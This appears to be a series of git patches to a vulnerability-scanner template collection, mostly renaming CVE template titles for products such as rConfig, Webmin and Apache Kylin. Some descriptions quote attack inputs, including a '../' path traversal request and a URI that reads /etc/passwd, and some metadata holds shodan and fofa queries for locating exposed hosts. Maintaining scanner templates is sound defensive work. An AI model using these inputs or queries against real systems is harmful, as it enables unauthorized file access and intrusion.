diff --git a/vulnerabilities/other/tikiwiki-json-rpc.yaml b/vulnerabilities/other/kiwitcms-json-rpc.yaml similarity index 97% rename from vulnerabilities/other/tikiwiki-json-rpc.yaml rename to vulnerabilities/other/kiwitcms-json-rpc.yaml index 798471ff80..411b9784b4 100644 --- a/vulnerabilities/other/tikiwiki-json-rpc.yaml +++ b/vulnerabilities/other/kiwitcms-json-rpc.yaml @@ -41,4 +41,4 @@ requests: - type: json part: body json: - - .result[].username \ No newline at end of file + - .result[].username From a74a2b3f28ea2b212220bd723e22cfc17f16dc92 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:33:38 +0900 Subject: [PATCH 0713/1415] Update CVE-2020-11991.yaml --- cves/2020/CVE-2020-11991.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-11991.yaml b/cves/2020/CVE-2020-11991.yaml index b7f29ed87b..6afa373c29 100644 --- a/cves/2020/CVE-2020-11991.yaml +++ b/cves/2020/CVE-2020-11991.yaml @@ -1,7 +1,7 @@ id: CVE-2020-11991 info: - name: Apache Cocoon 2.1.12 XML Injection + name: Apache Cocoon 2.1.12 - XML Injection author: pikpikcu severity: high description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system. From 4ceee2e905ecc2542b2c046b16d6bfc90df47d47 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:34:09 +0900 Subject: [PATCH 0714/1415] Update CVE-2020-10546.yaml --- cves/2020/CVE-2020-10546.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-10546.yaml b/cves/2020/CVE-2020-10546.yaml index 45b87eee18..6f33f801d8 100644 --- a/cves/2020/CVE-2020-10546.yaml +++ b/cves/2020/CVE-2020-10546.yaml @@ -1,7 +1,7 @@ id: CVE-2020-10546 info: - name: rConfig 3.9.4 SQL Injection + name: rConfig 3.9.4 - SQL Injection author: madrobot severity: critical description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, From dd19eac6205616a9e5df725710993912009c74b7 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:34:31 +0900 Subject: [PATCH 0715/1415] Update CVE-2020-10547.yaml --- cves/2020/CVE-2020-10547.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-10547.yaml b/cves/2020/CVE-2020-10547.yaml index fdef0f4534..31954d0c5c 100644 --- a/cves/2020/CVE-2020-10547.yaml +++ b/cves/2020/CVE-2020-10547.yaml @@ -1,7 +1,7 @@ id: CVE-2020-10547 info: - name: rConfig 3.9.4 SQL Injection + name: rConfig 3.9.4 - SQL Injection author: madrobot severity: critical description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. From 02b0fb60f08a8f9d99f991a7930cf75220272c68 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:35:06 +0900 Subject: [PATCH 0716/1415] Update CVE-2019-10232.yaml --- cves/2019/CVE-2019-10232.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-10232.yaml b/cves/2019/CVE-2019-10232.yaml index f98cfc1308..552cdd1ebc 100644 --- a/cves/2019/CVE-2019-10232.yaml +++ b/cves/2019/CVE-2019-10232.yaml @@ -1,7 +1,7 @@ id: CVE-2019-10232 info: - name: Teclib GLPI <= 9.3.3 Unauthenticated SQL Injection + name: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection author: RedTeamBrasil severity: critical description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature From d015697c4a314d048805e53064221c1c62a36d3e Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:35:48 +0900 Subject: [PATCH 0717/1415] Update CVE-2019-16662.yaml --- cves/2019/CVE-2019-16662.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-16662.yaml b/cves/2019/CVE-2019-16662.yaml index 7dd8c3a46a..7daf096ba7 100644 --- a/cves/2019/CVE-2019-16662.yaml +++ b/cves/2019/CVE-2019-16662.yaml @@ -1,7 +1,7 @@ id: CVE-2019-16662 info: - name: rConfig 3.9.2 Remote Code Execution + name: rConfig 3.9.2 - Remote Code Execution author: pikpikcu severity: critical description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution. From 482fe556174ca6347becc26f05697062cdd99c67 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:36:19 +0900 Subject: [PATCH 0718/1415] Update CVE-2019-12725.yaml --- cves/2019/CVE-2019-12725.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-12725.yaml b/cves/2019/CVE-2019-12725.yaml index 69712322c3..1d4c362566 100644 --- a/cves/2019/CVE-2019-12725.yaml +++ b/cves/2019/CVE-2019-12725.yaml @@ -1,7 +1,7 @@ id: CVE-2019-12725 info: - name: Zeroshell 3.9.0 Remote Command Execution + name: Zeroshell 3.9.0 - Remote Command Execution author: dwisiswant0,akincibor severity: critical description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters. From 2f915d59f953821265801dfa1cbc355e219151aa Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:36:42 +0900 Subject: [PATCH 0719/1415] Update CVE-2019-15107.yaml --- cves/2019/CVE-2019-15107.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-15107.yaml b/cves/2019/CVE-2019-15107.yaml index 8e9e449b72..ae765894fb 100644 --- a/cves/2019/CVE-2019-15107.yaml +++ b/cves/2019/CVE-2019-15107.yaml @@ -1,7 +1,7 @@ id: CVE-2019-15107 info: - name: Webmin <= 1.920 Unauthenticated Remote Command Execution + name: Webmin <= 1.920 - Unauthenticated Remote Command Execution author: bp0lr severity: critical description: Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi. From 5404ffafcccc9beb5ce1ee0d90f2f9bccf941373 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:37:01 +0900 Subject: [PATCH 0720/1415] Update CVE-2018-14912.yaml --- cves/2018/CVE-2018-14912.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-14912.yaml b/cves/2018/CVE-2018-14912.yaml index ccb43cade4..c1bc4eb9e6 100644 --- a/cves/2018/CVE-2018-14912.yaml +++ b/cves/2018/CVE-2018-14912.yaml @@ -1,7 +1,7 @@ id: CVE-2018-14912 info: - name: cgit < 1.2.1 Directory Traversal + name: cgit < 1.2.1 - Directory Traversal author: 0x_Akoko severity: high description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request. From 1b3a13f418a0bdc2ddf3aeb8a9b8a42289c961ef Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:37:49 +0900 Subject: [PATCH 0721/1415] Update CVE-2019-13392.yaml --- cves/2019/CVE-2019-13392.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-13392.yaml b/cves/2019/CVE-2019-13392.yaml index c2f949dc2e..bc333220d3 100644 --- a/cves/2019/CVE-2019-13392.yaml +++ b/cves/2019/CVE-2019-13392.yaml @@ -1,7 +1,7 @@ id: CVE-2019-13392 info: - name: MindPalette NateMail 3.0.15 Cross-Site Scripting + name: MindPalette NateMail 3.0.15 - Cross-Site Scripting author: pikpikcu severity: medium description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid. From fda85910b51072099fb914a7c38a47cebdd672c1 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:38:07 +0900 Subject: [PATCH 0722/1415] Update CVE-2019-16313.yaml --- cves/2019/CVE-2019-16313.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-16313.yaml b/cves/2019/CVE-2019-16313.yaml index 13f6df33f6..a2de7bbecf 100644 --- a/cves/2019/CVE-2019-16313.yaml +++ b/cves/2019/CVE-2019-16313.yaml @@ -1,7 +1,7 @@ id: CVE-2019-16313 info: - name: ifw8 Router ROM v4.31 Credential Discovery + name: ifw8 Router ROM v4.31 - Credential Discovery author: pikpikcu severity: high description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code. From 688b56b5dfe7d8ea191dd744b2332f20bde196c5 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 29 Nov 2022 00:38:16 -0500 Subject: [PATCH 0723/1415] Rename vulnerabilities/other/devalcms-xss.yaml to cves/2008/CVE-2008-6982.yaml --- .../other/devalcms-xss.yaml => cves/2008/CVE-2008-6982.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/other/devalcms-xss.yaml => cves/2008/CVE-2008-6982.yaml (100%) diff --git a/vulnerabilities/other/devalcms-xss.yaml b/cves/2008/CVE-2008-6982.yaml similarity index 100% rename from vulnerabilities/other/devalcms-xss.yaml rename to cves/2008/CVE-2008-6982.yaml From 0e180b052764e9443568bb8926af9dd4bfda4219 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:38:58 +0900 Subject: [PATCH 0724/1415] Update CVE-2019-12314.yaml --- cves/2019/CVE-2019-12314.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-12314.yaml b/cves/2019/CVE-2019-12314.yaml index 1ff737bb36..4e42963ae2 100644 --- a/cves/2019/CVE-2019-12314.yaml +++ b/cves/2019/CVE-2019-12314.yaml @@ -1,7 +1,7 @@ id: CVE-2019-12314 info: - name: Deltek Maconomy 2.2.5 Local File Inclusion + name: Deltek Maconomy 2.2.5 - Local File Inclusion author: madrobot severity: critical description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI. From 40a6f4fbe9a952335c15972d17166025c0385dbf Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:40:02 +0900 Subject: [PATCH 0725/1415] Update CVE-2019-13101.yaml --- cves/2019/CVE-2019-13101.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-13101.yaml b/cves/2019/CVE-2019-13101.yaml index f0d71f1629..222f69c32f 100644 --- a/cves/2019/CVE-2019-13101.yaml +++ b/cves/2019/CVE-2019-13101.yaml @@ -1,7 +1,7 @@ id: CVE-2019-13101 info: - name: D-Link DIR-600M Authentication Bypass + name: D-Link DIR-600M - Authentication Bypass author: Suman_Kar severity: critical description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page. From f67c87b7489a45d5c9a05bef280cbc6efabdbe5c Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:41:05 +0900 Subject: [PATCH 0726/1415] Update CVE-2020-13700.yaml --- cves/2020/CVE-2020-13700.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-13700.yaml b/cves/2020/CVE-2020-13700.yaml index a72076a338..be39f7225e 100644 --- a/cves/2020/CVE-2020-13700.yaml +++ b/cves/2020/CVE-2020-13700.yaml @@ -1,7 +1,7 @@ id: CVE-2020-13700 info: - name: WordPresss acf-to-rest-api <=3.1.0- Insecure Direct Object Reference + name: WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference author: pikpikcu severity: high description: | From 45083d6926dd57e123b241e9a7b69147908ae09e Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:41:24 +0900 Subject: [PATCH 0727/1415] Update CVE-2020-13937.yaml --- cves/2020/CVE-2020-13937.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml index 53149fd717..9a2d318e74 100644 --- a/cves/2020/CVE-2020-13937.yaml +++ b/cves/2020/CVE-2020-13937.yaml @@ -1,7 +1,7 @@ id: CVE-2020-13937 info: - name: Apache Kylin Exposed Configuration File + name: Apache Kylin - Exposed Configuration File author: pikpikcu severity: medium description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication. From 791577c83db7aaf3cc6d2d01dca45728923ddf1c Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:42:32 +0900 Subject: [PATCH 0728/1415] Update CVE-2020-25213.yaml --- cves/2020/CVE-2020-25213.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml index 32e21228e1..61c88f117a 100644 --- a/cves/2020/CVE-2020-25213.yaml +++ b/cves/2020/CVE-2020-25213.yaml @@ -4,7 +4,7 @@ id: CVE-2020-25213 # http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt info: - name: WordPress File Manager Plugin Remote Code Execution + name: WordPress File Manager Plugin - Remote Code Execution author: foulenzer severity: critical description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files. From 129bc02cdf98362b8bf83b2e7e590222c6d221d7 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:42:49 +0900 Subject: [PATCH 0729/1415] Update CVE-2020-25223.yaml --- cves/2020/CVE-2020-25223.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-25223.yaml b/cves/2020/CVE-2020-25223.yaml index a6071d6556..a5a62f627b 100644 --- a/cves/2020/CVE-2020-25223.yaml +++ b/cves/2020/CVE-2020-25223.yaml @@ -1,7 +1,7 @@ id: CVE-2020-25223 info: - name: Sophos UTM Preauth Remote Code Execution + name: Sophos UTM Preauth - Remote Code Execution author: gy741 severity: critical description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11. From ffe9a3592693b48e2212dc021d21f2c6b5460ac9 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:43:11 +0900 Subject: [PATCH 0730/1415] Update CVE-2020-25506.yaml --- cves/2020/CVE-2020-25506.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index ee17c0939a..c9c34af0e6 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -1,7 +1,7 @@ id: CVE-2020-25506 info: - name: D-Link DNS-320 Unauthenticated Remote Code Execution + name: D-Link DNS-320 - Unauthenticated Remote Code Execution author: gy741 severity: critical description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. From 7bba01759d742d4077376814b1dda3c93d1d0123 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:43:35 +0900 Subject: [PATCH 0731/1415] Update CVE-2020-2551.yaml --- cves/2020/CVE-2020-2551.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-2551.yaml b/cves/2020/CVE-2020-2551.yaml index d94ff6daaa..2fe19b5bc6 100644 --- a/cves/2020/CVE-2020-2551.yaml +++ b/cves/2020/CVE-2020-2551.yaml @@ -1,7 +1,7 @@ id: CVE-2020-2551 info: - name: Oracle WebLogic Server Remote Code Execution + name: Oracle WebLogic Server - Remote Code Execution author: dwisiswant0 severity: critical description: | From 8d67414e62232598789da32ffd52b562270791db Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:44:10 +0900 Subject: [PATCH 0732/1415] Update CVE-2020-35729.yaml --- cves/2020/CVE-2020-35729.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-35729.yaml b/cves/2020/CVE-2020-35729.yaml index 4a04f7f24c..3080fec1ca 100644 --- a/cves/2020/CVE-2020-35729.yaml +++ b/cves/2020/CVE-2020-35729.yaml @@ -1,7 +1,7 @@ id: CVE-2020-35729 info: - name: Klog Server <=2.41- Unauthenticated Command Injection + name: Klog Server <=2.41 - Unauthenticated Command Injection author: dwisiswant0 severity: critical description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7. From 903c4c1b5dcb8cb65aa65b0fb2363f8b03d41661 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:44:33 +0900 Subject: [PATCH 0733/1415] Update CVE-2020-35846.yaml --- cves/2020/CVE-2020-35846.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-35846.yaml b/cves/2020/CVE-2020-35846.yaml index 19d512d912..707ae1c8f5 100644 --- a/cves/2020/CVE-2020-35846.yaml +++ b/cves/2020/CVE-2020-35846.yaml @@ -1,7 +1,7 @@ id: CVE-2020-35846 info: - name: Agentejo Cockpit < 0.11.2 NoSQL Injection + name: Agentejo Cockpit < 0.11.2 - NoSQL Injection author: dwisiswant0 severity: critical description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value. From 4aadf9692a91f171fb5aed75338e7c3afb8e7c25 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:44:51 +0900 Subject: [PATCH 0734/1415] Update CVE-2020-35847.yaml --- cves/2020/CVE-2020-35847.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-35847.yaml b/cves/2020/CVE-2020-35847.yaml index 4088e8d03a..548eac30a2 100644 --- a/cves/2020/CVE-2020-35847.yaml +++ b/cves/2020/CVE-2020-35847.yaml @@ -1,7 +1,7 @@ id: CVE-2020-35847 info: - name: Agentejo Cockpit <0.11.2 NoSQL Injection + name: Agentejo Cockpit <0.11.2 - NoSQL Injection author: dwisiswant0 severity: critical description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller. From c41b0ff0ea9c7a0d6dfe1332e484579468738480 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Nov 2022 11:17:50 +0530 Subject: [PATCH 0737/1415] Update CVE-2021-35587.yaml --- cves/2021/CVE-2021-35587.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-35587.yaml b/cves/2021/CVE-2021-35587.yaml index 4ea3eb5802..24140f0313 100644 --- a/cves/2021/CVE-2021-35587.yaml +++ b/cves/2021/CVE-2021-35587.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2021-35587 cwe-id: CWE-502 metadata: + verified: true fofa-query: body="/oam/pages/css/login_page.css" shodan-query: http.title:"Oracle Access Management" tags: cve,cve2021,oam,rce,java,unauth,oracle From 36ebe675ab7fca00f4d8cfdbe98420d421053a95 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:47:56 +0900 Subject: [PATCH 0738/1415] Update CVE-2021-20114.yaml --- cves/2021/CVE-2021-20114.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-20114.yaml b/cves/2021/CVE-2021-20114.yaml index 5d50a6801f..5e4234dbd4 100644 --- a/cves/2021/CVE-2021-20114.yaml +++ b/cves/2021/CVE-2021-20114.yaml @@ -1,7 +1,7 @@ id: CVE-2021-20114 info: - name: TCExam <= 14.8.1 Sensitive Information Exposure + name: TCExam <= 14.8.1 - Sensitive Information Exposure author: push4d severity: high description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files. From b4186a98674b8d20c5553f7e992ac366048ec5d5 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:48:16 +0900 Subject: [PATCH 0739/1415] Update CVE-2021-31682.yaml --- cves/2021/CVE-2021-31682.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-31682.yaml b/cves/2021/CVE-2021-31682.yaml index 742659d2c8..8b4fb76130 100644 --- a/cves/2021/CVE-2021-31682.yaml +++ b/cves/2021/CVE-2021-31682.yaml @@ -1,7 +1,7 @@ id: CVE-2021-31682 info: - name: WebCTRL OEM <= 6.5 Cross-Site Scripting + name: WebCTRL OEM <= 6.5 - Cross-Site Scripting author: gy741,dhiyaneshDk severity: medium description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter. From 83fb3f2c1b621b363903681c98d2c4c2fb8fa9e8 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:48:51 +0900 Subject: [PATCH 0740/1415] Update CVE-2021-38751.yaml --- cves/2021/CVE-2021-38751.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-38751.yaml b/cves/2021/CVE-2021-38751.yaml index 84b24e75e3..6eeae88d11 100644 --- a/cves/2021/CVE-2021-38751.yaml +++ b/cves/2021/CVE-2021-38751.yaml @@ -1,7 +1,7 @@ id: CVE-2021-38751 info: - name: ExponentCMS <= 2.6 Host Header Injection + name: ExponentCMS <= 2.6 - Host Header Injection author: dwisiswant0 severity: medium description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack From fe8b11dbccd410852455470f3ca554803735bb86 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:49:16 +0900 Subject: [PATCH 0741/1415] Update CVE-2021-40438.yaml --- cves/2021/CVE-2021-40438.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-40438.yaml b/cves/2021/CVE-2021-40438.yaml index d3c9a19d7f..5424442045 100644 --- a/cves/2021/CVE-2021-40438.yaml +++ b/cves/2021/CVE-2021-40438.yaml @@ -1,7 +1,7 @@ id: CVE-2021-40438 info: - name: Apache <= 2.4.48 Mod_Proxy SSRF + name: Apache <= 2.4.48 - Mod_Proxy SSRF author: pdteam severity: critical description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user. From de4e86bb508f439d0394f93d4e6852ca296d3fc4 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:49:36 +0900 Subject: [PATCH 0742/1415] Update CVE-2021-41174.yaml --- cves/2021/CVE-2021-41174.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-41174.yaml b/cves/2021/CVE-2021-41174.yaml index 348eadf47e..795471ebdc 100644 --- a/cves/2021/CVE-2021-41174.yaml +++ b/cves/2021/CVE-2021-41174.yaml @@ -1,7 +1,7 @@ id: CVE-2021-41174 info: - name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting + name: Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting author: pdteam severity: medium description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions. From 076151eeef37b3bc0f39b509cb899267f8df59a4 Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:50:01 +0900 Subject: [PATCH 0744/1415] Update CVE-2021-43778.yaml --- cves/2021/CVE-2021-43778.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-43778.yaml b/cves/2021/CVE-2021-43778.yaml index 0ee2529fb2..d526128109 100644 --- a/cves/2021/CVE-2021-43778.yaml +++ b/cves/2021/CVE-2021-43778.yaml @@ -1,7 +1,7 @@ id: CVE-2021-43778 info: - name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability. + name: GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability. author: cckuailong severity: high description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. From 1cbc6de150bf358467bdb4c7ccf05b9fa8caa6aa Mon Sep 17 00:00:00 2001 From: Jongwon Baek Date: Tue, 29 Nov 2022 14:50:30 +0900 Subject: [PATCH 0745/1415] Update CVE-2021-45232.yaml --- cves/2021/CVE-2021-45232.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-45232.yaml b/cves/2021/CVE-2021-45232.yaml index b9ba133938..880b97330b 100644 --- a/cves/2021/CVE-2021-45232.yaml +++ b/cves/2021/CVE-2021-45232.yaml @@ -1,7 +1,7 @@ id: CVE-2021-45232 info: - name: Apache APISIX Dashboard <2.10.1 API Unauthorized Access + name: Apache APISIX Dashboard <2.10.1 - API Unauthorized Access author: Mr-xn severity: critical description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication. From c0fcd456ffa23f02f1d8edd5dbc51bfdf57ef0d0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Nov 2022 11:23:51 +0530 Subject: [PATCH 0746/1415] Update CVE-2008-6982.yaml --- cves/2008/CVE-2008-6982.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2008/CVE-2008-6982.yaml b/cves/2008/CVE-2008-6982.yaml index c25fbce8d5..8bc95c03ff 100644 --- a/cves/2008/CVE-2008-6982.yaml +++ b/cves/2008/CVE-2008-6982.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: devalcms,xss,cms,edb + tags: cve,cve2008,devalcms,xss,cms,edb requests: - method: GET From cde7e8622772fb3c7f46bc093b12217ade180e31 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 29 Nov 2022 06:03:06 +0000 Subject: [PATCH 0751/1415] Auto Generated CVE annotations [Tue Nov 29 06:03:06 UTC 2022] :robot: --- cves/2021/CVE-2021-35587.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-35587.yaml b/cves/2021/CVE-2021-35587.yaml index 24140f0313..1ca9fa3b33 100644 --- a/cves/2021/CVE-2021-35587.yaml +++ b/cves/2021/CVE-2021-35587.yaml @@ -19,7 +19,7 @@ info: verified: true fofa-query: body="/oam/pages/css/login_page.css" shodan-query: http.title:"Oracle Access Management" - tags: cve,cve2021,oam,rce,java,unauth,oracle + tags: cve,cve2021,oam,rce,java,unauth,oracle,kev requests: - method: GET From 7d4f699f79f554beeb45092ca33adc91aede2641 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 29 Nov 2022 13:26:07 +0530 Subject: [PATCH 0753/1415] Update persis-panel.yaml --- exposed-panels/persis-panel.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/exposed-panels/persis-panel.yaml b/exposed-panels/persis-panel.yaml 